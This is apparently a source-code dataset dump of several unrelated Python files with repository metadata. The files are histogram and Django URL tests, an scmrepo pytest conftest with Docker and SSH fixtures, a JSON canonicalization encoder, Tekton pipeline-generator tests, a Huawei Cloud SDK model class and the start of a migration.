hist_bh = bh.Histogram(hist_1)
assert type(hist_bh.axes[0]) == bh.axis.Regular
assert type(hist_bh.axes[1]) == bh.axis.Integer
assert hist_bh.axes[0].name == "a"
assert hist_bh.axes[1].name == "b"
hist_2 = CustomHist(hist_bh)
assert type(hist_2.axes[0]) == Regular
assert type(hist_2.axes[1]) == Integer
assert hist_2.axes[0].name == "a"
assert hist_2.axes[1].name == "b"
# Just verify no-op status
hist_3 = CustomHist(hist_1)
assert type(hist_3.axes[0]) == Regular
assert type(hist_3.axes[1]) == Integer
assert hist_3.axes[0].name == "a"
assert hist_3.axes[1].name == "b"
def test_access():
hist = CustomHist(Regular(10, 0, 1, name="a"), Regular(20, 0, 4, name="b"))
assert hist.axes["a"] == hist.axes[0]
assert hist.axes["b"] == hist.axes[1]
from_bh = bh.Histogram(bh.axis.Regular(10, 0, 1), bh.axis.Regular(20, 0, 4))
from_bh.axes.name = "a", "b"
hist_conv = CustomHist(from_bh)
assert hist_conv.axes["a"] == hist_conv.axes[0]
assert hist_conv.axes["b"] == hist_conv.axes[1]
def test_hist_name_set():
hist_1 = CustomHist(Regular(10, 0, 1, name="a"), Regular(20, 0, 4, name="b"))
hist_1.axes.name = ("c", "d")
assert hist_1.axes.name == ("test: c", "test: d")
with pytest.raises(AttributeError):
hist_1.axes[0].name = "a"
hist_1.axes.label = ("one", "two")
assert hist_1.axes.label == ("one", "two")
with pytest.raises(ValueError):
hist_1.axes.label = ("one",)
with pytest.raises(ValueError):
hist_1.axes.label = ("one", "two", "three")
| 29.162011
| 81
| 0.61705
|
794b1f77e3d869b0a0e4610732fdf537233ff493
| 3,829
|
py
|
Python
|
tests/conftest.py
|
pmrowla/scmrepo
|
4f33b3558d802bfb0f33992f83e5d72cccf50c5b
|
[
"Apache-2.0"
] | 8
|
2021-11-26T05:45:20.000Z
|
2022-03-04T09:27:28.000Z
|
tests/conftest.py
|
pmrowla/scmrepo
|
4f33b3558d802bfb0f33992f83e5d72cccf50c5b
|
[
"Apache-2.0"
] | 24
|
2021-11-26T03:40:26.000Z
|
2022-03-29T04:11:09.000Z
|
tests/conftest.py
|
pmrowla/scmrepo
|
4f33b3558d802bfb0f33992f83e5d72cccf50c5b
|
[
"Apache-2.0"
] | 5
|
2021-12-06T02:50:57.000Z
|
2021-12-27T12:02:37.000Z
|
import asyncio
import os
import subprocess
import sys
from typing import Any, AsyncIterator, Dict, Iterator
import asyncssh
import pygit2
import pytest
from pytest_test_utils import TempDirFactory, TmpDir
from scmrepo.git import Git
TEST_SSH_USER = "user"
TEST_SSH_KEY_PATH = os.path.join(
os.path.abspath(os.path.dirname(__file__)), f"{TEST_SSH_USER}.key"
)
# pylint: disable=redefined-outer-name
def pytest_addoption(parser):
parser.addoption(
"--slow", action="store_true", default=False, help="run slow tests"
)
def pytest_collection_modifyitems(config, items):
if config.getoption("--slow"):
return
skip_slow = pytest.mark.skip(reason="need --slow option to run")
for item in items:
if "slow" in item.keywords:
item.add_marker(skip_slow)
@pytest.fixture(autouse=True)
def isolate(
tmp_dir_factory: TempDirFactory, monkeypatch: pytest.MonkeyPatch
) -> None:
path = tmp_dir_factory.mktemp("mock")
home_dir = path / "home"
home_dir.mkdir()
if sys.platform == "win32":
home_drive, home_path = os.path.splitdrive(home_dir)
monkeypatch.setenv("USERPROFILE", str(home_dir))
monkeypatch.setenv("HOMEDRIVE", home_drive)
monkeypatch.setenv("HOMEPATH", home_path)
else:
monkeypatch.setenv("HOME", str(home_dir))
monkeypatch.setenv("GIT_CONFIG_NOSYSTEM", "1")
contents = b"""
[user]
name=DVC Tester
email=dvctester@example.com
[init]
defaultBranch=master
"""
(home_dir / ".gitconfig").write_bytes(contents)
pygit2.settings.search_path[pygit2.GIT_CONFIG_LEVEL_GLOBAL] = str(home_dir)
@pytest.fixture
def scm(tmp_dir: TmpDir) -> Iterator[Git]:
git_ = Git.init(tmp_dir)
sig = git_.pygit2.default_signature
assert sig.email == "dvctester@example.com"
assert sig.name == "DVC Tester"
yield git_
git_.close()
@pytest.fixture(scope="session")
def docker(request: pytest.FixtureRequest):
for cmd in [("docker", "ps"), ("docker-compose", "version")]:
try:
subprocess.check_call(
cmd,
stderr=subprocess.DEVNULL,
stdout=subprocess.DEVNULL,
)
except (subprocess.CalledProcessError, OSError):
pytest.skip(f"no {cmd[0]} installed")
if "CI" in os.environ and os.name == "nt":
pytest.skip("disabled for Windows on Github Actions")
pytest.importorskip("pytest_docker")
yield request.getfixturevalue("docker_services")
@pytest.fixture
def ssh_conn_info(
docker, # pylint: disable=unused-argument
) -> Dict[str, Any]:
conn_info = {
"host": "127.0.0.1",
"port": docker.port_for("git-server", 2222),
"client_keys": TEST_SSH_KEY_PATH,
"known_hosts": None,
"username": TEST_SSH_USER,
}
async def _check() -> bool:
try:
async with asyncssh.connect(**conn_info) as conn:
result = await conn.run("git --version")
assert result.returncode == 0
async with conn.start_sftp_client() as sftp:
assert await sftp.exists("/")
except Exception: # pylint: disable=broad-except
return False
return True
def check() -> bool:
return asyncio.run(_check())
docker.wait_until_responsive(timeout=30.0, pause=1, check=check)
return conn_info
@pytest.fixture
async def ssh_connection(
ssh_conn_info: Dict[str, Any],
) -> AsyncIterator[asyncssh.connection.SSHClientConnection]:
async with asyncssh.connect(**ssh_conn_info) as conn:
yield conn
@pytest.fixture
async def sftp(
ssh_connection: asyncssh.connection.SSHClientConnection,
) -> AsyncIterator[asyncssh.SFTPClient]:
async with ssh_connection.start_sftp_client() as sftp:
yield sftp
| 27.35
| 79
| 0.662575
|
794b1fc41d299cc1fb99325307ba687caf8a73c2
| 18,441
|
py
|
Python
|
apifetch/jsonc/Canonicalize.py
|
matrey/apifetch
|
c32e6b00dd18e8b00948f4b7eef390bdb621e62d
|
[
"Apache-2.0"
] | null | null | null |
apifetch/jsonc/Canonicalize.py
|
matrey/apifetch
|
c32e6b00dd18e8b00948f4b7eef390bdb621e62d
|
[
"Apache-2.0"
] | null | null | null |
apifetch/jsonc/Canonicalize.py
|
matrey/apifetch
|
c32e6b00dd18e8b00948f4b7eef390bdb621e62d
|
[
"Apache-2.0"
] | null | null | null |
# From https://raw.githubusercontent.com/cyberphone/json-canonicalization/472e9e142de304b5b7c4be0fec6016fbe3531098/python3/src/org/webpki/json/Canonicalize.py
##############################################################################
# #
# Copyright 2006-2019 WebPKI.org (http://webpki.org). #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); #
# you may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# https://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
# #
##############################################################################
#################################################
# JCS compatible JSON serializer for Python 3.x #
#################################################
import re
from .NumberToJson import convert2Es6Format
try:
from _json import encode_basestring_ascii as c_encode_basestring_ascii
except ImportError:
c_encode_basestring_ascii = None # type: ignore
try:
from _json import encode_basestring as c_encode_basestring # type: ignore
except ImportError:
c_encode_basestring = None
try:
from _json import make_encoder as c_make_encoder
except ImportError:
c_make_encoder = None # type: ignore
ESCAPE = re.compile(r'[\x00-\x1f\\"\b\f\n\r\t]')
ESCAPE_ASCII = re.compile(r'([\\"]|[^\ -~])')
HAS_UTF8 = re.compile(b"[\x80-\xff]")
ESCAPE_DCT = {
"\\": "\\\\",
'"': '\\"',
"\b": "\\b",
"\f": "\\f",
"\n": "\\n",
"\r": "\\r",
"\t": "\\t",
}
for i in range(0x20):
ESCAPE_DCT.setdefault(chr(i), "\\u{0:04x}".format(i))
# ESCAPE_DCT.setdefault(chr(i), '\\u%04x' % (i,))
INFINITY = float("inf")
def py_encode_basestring(s):
"""Return a JSON representation of a Python string"""
def replace(match):
return ESCAPE_DCT[match.group(0)]
return '"' + ESCAPE.sub(replace, s) + '"'
encode_basestring = c_encode_basestring or py_encode_basestring
def py_encode_basestring_ascii(s):
"""Return an ASCII-only JSON representation of a Python string"""
def replace(match):
s = match.group(0)
try:
return ESCAPE_DCT[s]
except KeyError:
n = ord(s)
if n < 0x10000:
return "\\u{0:04x}".format(n)
# return '\\u%04x' % (n,)
else:
# surrogate pair
n -= 0x10000
s1 = 0xD800 | ((n >> 10) & 0x3FF)
s2 = 0xDC00 | (n & 0x3FF)
return "\\u{0:04x}\\u{1:04x}".format(s1, s2)
return '"' + ESCAPE_ASCII.sub(replace, s) + '"'
encode_basestring_ascii = c_encode_basestring_ascii or py_encode_basestring_ascii
class JSONEncoder(object):
"""Extensible JSON <http://json.org> encoder for Python data structures.
Supports the following objects and types by default:
+-------------------+---------------+
| Python | JSON |
+===================+===============+
| dict | object |
+-------------------+---------------+
| list, tuple | array |
+-------------------+---------------+
| str | string |
+-------------------+---------------+
| int, float | number |
+-------------------+---------------+
| True | true |
+-------------------+---------------+
| False | false |
+-------------------+---------------+
| None | null |
+-------------------+---------------+
To extend this to recognize other objects, subclass and implement a
``.default()`` method with another method that returns a serializable
object for ``o`` if possible, otherwise it should call the superclass
implementation (to raise ``TypeError``).
"""
item_separator = ", "
key_separator = ": "
def __init__(
self,
*,
skipkeys=False,
ensure_ascii=False,
check_circular=True,
allow_nan=True,
sort_keys=True,
indent=None,
separators=(",", ":"),
default=None
):
"""Constructor for JSONEncoder, with sensible defaults.
If skipkeys is false, then it is a TypeError to attempt
encoding of keys that are not str, int, float or None. If
skipkeys is True, such items are simply skipped.
If ensure_ascii is true, the output is guaranteed to be str
objects with all incoming non-ASCII characters escaped. If
ensure_ascii is false, the output can contain non-ASCII characters.
If check_circular is true, then lists, dicts, and custom encoded
objects will be checked for circular references during encoding to
prevent an infinite recursion (which would cause an OverflowError).
Otherwise, no such check takes place.
If allow_nan is true, then NaN, Infinity, and -Infinity will be
encoded as such. This behavior is not JSON specification compliant,
but is consistent with most JavaScript based encoders and decoders.
Otherwise, it will be a ValueError to encode such floats.
If sort_keys is true, then the output of dictionaries will be
sorted by key; this is useful for regression tests to ensure
that JSON serializations can be compared on a day-to-day basis.
If indent is a non-negative integer, then JSON array
elements and object members will be pretty-printed with that
indent level. An indent level of 0 will only insert newlines.
None is the most compact representation.
If specified, separators should be an (item_separator, key_separator)
tuple. The default is (', ', ': ') if *indent* is ``None`` and
(',', ': ') otherwise. To get the most compact JSON representation,
you should specify (',', ':') to eliminate whitespace.
If specified, default is a function that gets called for objects
that can't otherwise be serialized. It should return a JSON encodable
version of the object or raise a ``TypeError``.
"""
self.skipkeys = skipkeys
self.ensure_ascii = ensure_ascii
self.check_circular = check_circular
self.allow_nan = allow_nan
self.sort_keys = sort_keys
self.indent = indent
if separators is not None:
self.item_separator, self.key_separator = separators
elif indent is not None:
self.item_separator = ","
if default is not None:
self.default = default
def default(self, o):
"""Implement this method in a subclass such that it returns
a serializable object for ``o``, or calls the base implementation
(to raise a ``TypeError``).
For example, to support arbitrary iterators, you could
implement default like this::
def default(self, o):
try:
iterable = iter(o)
except TypeError:
pass
else:
return list(iterable)
# Let the base class default method raise the TypeError
return JSONEncoder.default(self, o)
"""
raise TypeError(
"Object of type '%s' is not JSON serializable" % o.__class__.__name__
)
def encode(self, o):
"""Return a JSON string representation of a Python data structure.
>>> from json.encoder import JSONEncoder
>>> JSONEncoder().encode({"foo": ["bar", "baz"]})
'{"foo": ["bar", "baz"]}'
"""
# This is for extremely simple cases and benchmarks.
if isinstance(o, str):
if self.ensure_ascii:
return encode_basestring_ascii(o)
else:
return encode_basestring(o)
# This doesn't pass the iterator directly to ''.join() because the
# exceptions aren't as detailed. The list call should be roughly
# equivalent to the PySequence_Fast that ''.join() would do.
chunks = self.iterencode(o, _one_shot=False)
if not isinstance(chunks, (list, tuple)):
chunks = list(chunks)
return "".join(chunks)
def iterencode(self, o, _one_shot=False):
"""Encode the given object and yield each string
representation as available.
For example::
for chunk in JSONEncoder().iterencode(bigobject):
mysocket.write(chunk)
"""
if self.check_circular:
markers = {}
else:
markers = None
if self.ensure_ascii:
_encoder = encode_basestring_ascii
else:
_encoder = encode_basestring
def floatstr(
o,
allow_nan=self.allow_nan,
_repr=float.__repr__,
_inf=INFINITY,
_neginf=-INFINITY,
):
# Check for specials. Note that this type of test is processor
# and/or platform-specific, so do tests which don't depend on the
# internals.
if o != o:
text = "NaN"
elif o == _inf:
text = "Infinity"
elif o == _neginf:
text = "-Infinity"
else:
return _repr(o)
if not allow_nan:
raise ValueError(
"Out of range float values are not JSON compliant: " + repr(o)
)
return text
if _one_shot and c_make_encoder is not None and self.indent is None:
_iterencode = c_make_encoder(
markers,
self.default,
_encoder,
self.indent,
self.key_separator,
self.item_separator,
self.sort_keys,
self.skipkeys,
self.allow_nan,
)
else:
_iterencode = _make_iterencode(
markers,
self.default,
_encoder,
self.indent,
floatstr,
self.key_separator,
self.item_separator,
self.sort_keys,
self.skipkeys,
_one_shot,
)
return _iterencode(o, 0)
def _make_iterencode(
markers,
_default,
_encoder,
_indent,
_floatstr,
_key_separator,
_item_separator,
_sort_keys,
_skipkeys,
_one_shot,
## HACK: hand-optimized bytecode; turn globals into locals
ValueError=ValueError,
dict=dict,
float=float,
id=id,
int=int,
isinstance=isinstance,
list=list,
str=str,
tuple=tuple,
_intstr=int.__str__,
):
if _indent is not None and not isinstance(_indent, str):
_indent = " " * _indent
def _iterencode_list(lst, _current_indent_level):
if not lst:
yield "[]"
return
if markers is not None:
markerid = id(lst)
if markerid in markers:
raise ValueError("Circular reference detected")
markers[markerid] = lst
buf = "["
if _indent is not None:
_current_indent_level += 1
newline_indent = "\n" + _indent * _current_indent_level
separator = _item_separator + newline_indent
buf += newline_indent
else:
newline_indent = None
separator = _item_separator
first = True
for value in lst:
if first:
first = False
else:
buf = separator
if isinstance(value, str):
yield buf + _encoder(value)
elif value is None:
yield buf + "null"
elif value is True:
yield buf + "true"
elif value is False:
yield buf + "false"
elif isinstance(value, int):
# Subclasses of int/float may override __str__, but we still
# want to encode them as integers/floats in JSON. One example
# within the standard library is IntEnum.
yield buf + convert2Es6Format(value)
elif isinstance(value, float):
# see comment above for int
yield buf + convert2Es6Format(value)
else:
yield buf
if isinstance(value, (list, tuple)):
chunks = _iterencode_list(value, _current_indent_level)
elif isinstance(value, dict):
chunks = _iterencode_dict(value, _current_indent_level)
else:
chunks = _iterencode(value, _current_indent_level)
yield from chunks
if newline_indent is not None:
_current_indent_level -= 1
yield "\n" + _indent * _current_indent_level
yield "]"
if markers is not None:
del markers[markerid]
def _iterencode_dict(dct, _current_indent_level):
if not dct:
yield "{}"
return
if markers is not None:
markerid = id(dct)
if markerid in markers:
raise ValueError("Circular reference detected")
markers[markerid] = dct
yield "{"
if _indent is not None:
_current_indent_level += 1
newline_indent = "\n" + _indent * _current_indent_level
item_separator = _item_separator + newline_indent
yield newline_indent
else:
newline_indent = None
item_separator = _item_separator
first = True
if _sort_keys:
items = sorted(dct.items(), key=lambda kv: kv[0].encode("utf-16_be"))
else:
items = dct.items()
for key, value in items:
if isinstance(key, str):
pass
# JavaScript is weakly typed for these, so it makes sense to
# also allow them. Many encoders seem to do something like this.
elif isinstance(key, float):
# see comment for int/float in _make_iterencode
key = convert2Es6Format(key)
elif key is True:
key = "true"
elif key is False:
key = "false"
elif key is None:
key = "null"
elif isinstance(key, int):
# see comment for int/float in _make_iterencode
key = convert2Es6Format(key)
elif _skipkeys:
continue
else:
raise TypeError("key " + repr(key) + " is not a string")
if first:
first = False
else:
yield item_separator
yield _encoder(key)
yield _key_separator
if isinstance(value, str):
yield _encoder(value)
elif value is None:
yield "null"
elif value is True:
yield "true"
elif value is False:
yield "false"
elif isinstance(value, int):
# see comment for int/float in _make_iterencode
yield convert2Es6Format(value)
elif isinstance(value, float):
# see comment for int/float in _make_iterencode
yield convert2Es6Format(value)
else:
if isinstance(value, (list, tuple)):
chunks = _iterencode_list(value, _current_indent_level)
elif isinstance(value, dict):
chunks = _iterencode_dict(value, _current_indent_level)
else:
chunks = _iterencode(value, _current_indent_level)
yield from chunks
if newline_indent is not None:
_current_indent_level -= 1
yield "\n" + _indent * _current_indent_level
yield "}"
if markers is not None:
del markers[markerid]
def _iterencode(o, _current_indent_level):
if isinstance(o, str):
yield _encoder(o)
elif o is None:
yield "null"
elif o is True:
yield "true"
elif o is False:
yield "false"
elif isinstance(o, int):
# see comment for int/float in _make_iterencode
yield convert2Es6Format(o)
elif isinstance(o, float):
# see comment for int/float in _make_iterencode
yield convert2Es6Format(o)
elif isinstance(o, (list, tuple)):
yield from _iterencode_list(o, _current_indent_level)
elif isinstance(o, dict):
yield from _iterencode_dict(o, _current_indent_level)
else:
if markers is not None:
markerid = id(o)
if markerid in markers:
raise ValueError("Circular reference detected")
markers[markerid] = o
o = _default(o)
yield from _iterencode(o, _current_indent_level)
if markers is not None:
del markers[markerid]
return _iterencode
def canonicalize(obj, utf8=True):
textVal = JSONEncoder(sort_keys=True).encode(obj)
if utf8:
return textVal.encode()
return textVal
def serialize(obj, utf8=True):
textVal = JSONEncoder(sort_keys=False).encode(obj)
if utf8:
return textVal.encode()
return textVal
| 35.327586
| 158
| 0.527737
|
794b202049eb7db557e22ec2af28478e1271df92
| 5,195
|
py
|
Python
|
totkn/test/test_totkn.py
|
powellquiring/pycli
|
ecc5beec84833b978dfa41259ab3ac306617fc55
|
[
"Apache-2.0"
] | null | null | null |
totkn/test/test_totkn.py
|
powellquiring/pycli
|
ecc5beec84833b978dfa41259ab3ac306617fc55
|
[
"Apache-2.0"
] | 2
|
2021-04-06T18:19:56.000Z
|
2021-06-02T03:28:55.000Z
|
totkn/test/test_totkn.py
|
powellquiring/pycli
|
ecc5beec84833b978dfa41259ab3ac306617fc55
|
[
"Apache-2.0"
] | null | null | null |
from totkn import *
import totkn
import pytest
import click
import yaml
import attr
def test_syntax() -> None:
p = Pipeline(name="pl")
s = p.to_yaml()
click.echo(s)
def verify(expected, tekton_obj) -> None:
if type(expected) == str:
expected = yaml.load(expected, Loader=yaml.SafeLoader)
result_str = tekton_obj.to_yaml()
click.echo(result_str)
result = yaml.load(result_str, Loader=yaml.SafeLoader)
assert result == expected
ubuntu_task_str = """
apiVersion: tekton.dev/v1beta1
kind: Task
metadata:
name: mytask
spec:
steps:
- image: ubuntu
"""
def test_task_readme_example1() -> None:
verify(ubuntu_task_str, Task(name="mytask", steps=[Step(image="ubuntu")]))
def xtest_task_readme_example2() -> None:
click.echo(Task().to_yaml(check=False))
def test_task_str() -> None:
step = totkn.Step("ubuntu")
task = totkn.Task("mytask")
task.steps = [step]
verify(ubuntu_task_str, task)
def test_task_steps() -> None:
step = totkn.Step()
step.image = "ubuntu"
step.name = "echo"
step.command = ["echo"]
step.args = ["01 version"]
task = totkn.Task("the-task")
task.steps = [step]
verify(
"""
apiVersion: tekton.dev/v1beta1
kind: Task
metadata:
name: the-task
spec:
steps:
- name: echo
image: ubuntu
command:
- echo
args:
- "01 version"
""",
task,
)
def test_task_missing_step() -> None:
task = totkn.Task("mytask")
try:
task.to_yaml()
except MissingAttribute as ma:
assert isinstance(ma, MissingAttribute)
def test_pipeline_str() -> None:
task = totkn.Task("mytask")
p = totkn.Pipeline(name="pipelinename")
p.tasks = [PipelineTask("ptask", task.ref())]
pt = totkn.PipelineTask()
pt.name = "pipeline-taskref-name"
verify(
"""
apiVersion: tekton.dev/v1beta1
kind: Pipeline
metadata:
name: pipelinename
spec:
tasks:
- name: ptask
taskRef:
name: mytask
""",
p,
)
def test_trigger() -> None:
task = totkn.Task("mytask")
p = totkn.Pipeline(name="pipeline")
p.tasks = [PipelineTask("ptask", task.ref())]
pt = totkn.PipelineTask()
pt.name = "pipeline-taskref-name"
pr = PipelineRun("pipelinerun-$(uid)")
pr.pipelineRef = p.ref()
verify(
"""
apiVersion: tekton.dev/v1beta1
kind: PipelineRun
metadata:
name: pipelinerun-$(uid)
spec:
pipelineRef:
name: pipeline
""",
pr,
)
tt = TriggerTemplate("theTemplateTrigger")
tt.resourcetemplates = [pr]
verify(
"""
apiVersion: tekton.dev/v1alpha1
kind: TriggerTemplate
metadata:
name: theTemplateTrigger
spec:
resourcetemplates:
- apiVersion: tekton.dev/v1beta1
kind: PipelineRun
metadata:
name: pipelinerun-$(uid)
spec:
pipelineRef:
name: pipeline
""",
tt,
)
def test_trigger_exception() -> None:
tt = TriggerTemplate()
pr = PipelineRun("pipelinerun-$(uid)")
tt.resourcetemplates = [pr]
try:
tt.to_yaml()
except Exception as e:
assert isinstance(e, MissingAttribute)
return
assert False
def test_trigger_binding() -> None:
tb = TriggerBinding("theTriggerBinding")
verify(
"""
apiVersion: tekton.dev/v1alpha1
kind: TriggerBinding
metadata:
name: theTriggerBinding
""",
tb,
)
def test_event_listener() -> None:
el = EventListener("the-listener")
elt = EventListenerTrigger(
binding=Ref("theTriggerBinding"), template=Ref("theTemplateTrigger")
)
el.triggers = [elt]
verify(
"""
apiVersion: tekton.dev/v1alpha1
kind: EventListener
metadata:
name: the-listener
spec:
triggers:
- binding:
name: theTriggerBinding
template:
name: theTemplateTrigger
""",
el,
)
def task_dict(name):
return {
"apiVersion": "tekton.dev/v1beta1",
"kind": "Task",
"metadata": {"name": name,},
}
def xtest_task_description():
t1 = totkn.Task("secret-env-task", description="the description")
t1.params = [totkn.Param()]
click.echo(t1.params)
t1.steps = [totkn.Step(image="ubuntu")]
d = task_dict("secret-env-task")
d["metadata"]["annotations"] = {"description": "the description"}
verify(d, t1)
t2 = totkn.Task("secret-env-task")
t2.description("the description")
t2.steps.append(totkn.Step(image="ubuntu"))
verify(d, t2)
import examples.lab1_simple.gen as lab1
import examples.lab2_parameters.gen as lab2
def lab_test(gen, fs) -> None:
expected = []
with open(fs + "/expected.yaml") as f:
for doc in yaml.load_all(f, Loader=yaml.SafeLoader):
expected.append(doc)
s = gen()
actual = []
for doc in yaml.load_all(s, Loader=yaml.SafeLoader):
actual.append(doc)
for i in range(0, len(actual)):
assert expected[i] == actual[i]
assert len(expected) == len(actual)
def test_example_lab1() -> None:
lab_test(lab1.gen, "examples/lab1_simple")
def test_example_lab2() -> None:
lab_test(lab2.gen, "examples/lab2_parameters")
| 21.032389
| 78
| 0.621944
|
794b2104592feb626c66a9e626caf3f468464b2a
| 5,572
|
py
|
Python
|
huaweicloud-sdk-sms/huaweicloudsdksms/v3/model/volume_groups.py
|
huaweicloud/huaweicloud-sdk-python-v3
|
7a6270390fcbf192b3882bf763e7016e6026ef78
|
[
"Apache-2.0"
] | 64
|
2020-06-12T07:05:07.000Z
|
2022-03-30T03:32:50.000Z
|
huaweicloud-sdk-sms/huaweicloudsdksms/v3/model/volume_groups.py
|
huaweicloud/huaweicloud-sdk-python-v3
|
7a6270390fcbf192b3882bf763e7016e6026ef78
|
[
"Apache-2.0"
] | 11
|
2020-07-06T07:56:54.000Z
|
2022-01-11T11:14:40.000Z
|
huaweicloud-sdk-sms/huaweicloudsdksms/v3/model/volume_groups.py
|
huaweicloud/huaweicloud-sdk-python-v3
|
7a6270390fcbf192b3882bf763e7016e6026ef78
|
[
"Apache-2.0"
] | 24
|
2020-06-08T11:42:13.000Z
|
2022-03-04T06:44:08.000Z
|
# coding: utf-8
import re
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class VolumeGroups:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'components': 'str',
'free_size': 'int',
'logical_volumes': 'list[LogicalVolumes]',
'name': 'str',
'size': 'int'
}
attribute_map = {
'components': 'components',
'free_size': 'free_size',
'logical_volumes': 'logical_volumes',
'name': 'name',
'size': 'size'
}
def __init__(self, components=None, free_size=None, logical_volumes=None, name=None, size=None):
"""VolumeGroups - a model defined in huaweicloud sdk"""
self._components = None
self._free_size = None
self._logical_volumes = None
self._name = None
self._size = None
self.discriminator = None
if components is not None:
self.components = components
if free_size is not None:
self.free_size = free_size
if logical_volumes is not None:
self.logical_volumes = logical_volumes
if name is not None:
self.name = name
if size is not None:
self.size = size
@property
def components(self):
"""Gets the components of this VolumeGroups.
Pv信息
:return: The components of this VolumeGroups.
:rtype: str
"""
return self._components
@components.setter
def components(self, components):
"""Sets the components of this VolumeGroups.
Pv信息
:param components: The components of this VolumeGroups.
:type: str
"""
self._components = components
@property
def free_size(self):
"""Gets the free_size of this VolumeGroups.
剩余空间
:return: The free_size of this VolumeGroups.
:rtype: int
"""
return self._free_size
@free_size.setter
def free_size(self, free_size):
"""Sets the free_size of this VolumeGroups.
剩余空间
:param free_size: The free_size of this VolumeGroups.
:type: int
"""
self._free_size = free_size
@property
def logical_volumes(self):
"""Gets the logical_volumes of this VolumeGroups.
lv信息
:return: The logical_volumes of this VolumeGroups.
:rtype: list[LogicalVolumes]
"""
return self._logical_volumes
@logical_volumes.setter
def logical_volumes(self, logical_volumes):
"""Sets the logical_volumes of this VolumeGroups.
lv信息
:param logical_volumes: The logical_volumes of this VolumeGroups.
:type: list[LogicalVolumes]
"""
self._logical_volumes = logical_volumes
@property
def name(self):
"""Gets the name of this VolumeGroups.
名称
:return: The name of this VolumeGroups.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this VolumeGroups.
名称
:param name: The name of this VolumeGroups.
:type: str
"""
self._name = name
@property
def size(self):
"""Gets the size of this VolumeGroups.
大小
:return: The size of this VolumeGroups.
:rtype: int
"""
return self._size
@size.setter
def size(self, size):
"""Sets the size of this VolumeGroups.
大小
:param size: The size of this VolumeGroups.
:type: int
"""
self._size = size
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, VolumeGroups):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 24.986547
| 100
| 0.554738
|
794b223a5f6cbcf3524333c7a298307f5527ee8f
| 664
|
py
|
Python
|
estore_project/users/tests/test_urls.py
|
Jawayria/estore_project
|
ad0c2f30b9a4d8a02b37ea29dfb2259635c55517
|
[
"MIT"
] | null | null | null |
estore_project/users/tests/test_urls.py
|
Jawayria/estore_project
|
ad0c2f30b9a4d8a02b37ea29dfb2259635c55517
|
[
"MIT"
] | 1
|
2021-05-19T06:41:50.000Z
|
2021-05-19T06:41:50.000Z
|
estore_project/users/tests/test_urls.py
|
Jawayria/estore_project
|
ad0c2f30b9a4d8a02b37ea29dfb2259635c55517
|
[
"MIT"
] | null | null | null |
import pytest
from django.urls import resolve, reverse
from estore_project.users.models import User
pytestmark = pytest.mark.django_db
def test_detail(user: User):
assert (
reverse("users:detail", kwargs={"username": user.username})
== f"/users/{user.username}/"
)
assert resolve(f"/users/{user.username}/").view_name == "users:detail"
def test_update():
assert reverse("users:update") == "/users/~update/"
assert resolve("/users/~update/").view_name == "users:update"
def test_redirect():
assert reverse("users:redirect") == "/users/~redirect/"
assert resolve("/users/~redirect/").view_name == "users:redirect"
| 26.56
| 74
| 0.679217
|
794b2268f3c910fddebc9c4d3e9f66fe1d1fa7ba
| 772
|
py
|
Python
|
backend/Backendapi/bookdata/migrations/0020_notecomment.py
|
f0rdream/SkyRead
|
798b4dd35b7e6be41e5fed4537d3f6034d20494e
|
[
"MIT"
] | null | null | null |
backend/Backendapi/bookdata/migrations/0020_notecomment.py
|
f0rdream/SkyRead
|
798b4dd35b7e6be41e5fed4537d3f6034d20494e
|
[
"MIT"
] | null | null | null |
backend/Backendapi/bookdata/migrations/0020_notecomment.py
|
f0rdream/SkyRead
|
798b4dd35b7e6be41e5fed4537d3f6034d20494e
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('bookdata', '0019_note_shared'),
]
operations = [
migrations.CreateModel(
name='NoteComment',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('content', models.CharField(max_length=1000)),
('note', models.ForeignKey(to='bookdata.Note')),
('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),
],
),
]
| 29.692308
| 114
| 0.612694
|
794b239d7aeac4ed946beb44757762101f798569
| 997
|
py
|
Python
|
apps/incidents/migrations/0002_auto_20181122_1103.py
|
seanlefevre/openduty
|
34ab21117f114ccc808d8b0aa2cb801c819bdb86
|
[
"MIT"
] | 145
|
2016-04-11T06:53:13.000Z
|
2022-03-22T05:15:49.000Z
|
apps/incidents/migrations/0002_auto_20181122_1103.py
|
seanlefevre/openduty
|
34ab21117f114ccc808d8b0aa2cb801c819bdb86
|
[
"MIT"
] | 78
|
2017-09-24T10:59:49.000Z
|
2022-02-12T07:36:27.000Z
|
apps/incidents/migrations/0002_auto_20181122_1103.py
|
seanlefevre/openduty
|
34ab21117f114ccc808d8b0aa2cb801c819bdb86
|
[
"MIT"
] | 30
|
2016-04-11T06:53:16.000Z
|
2021-12-29T11:39:26.000Z
|
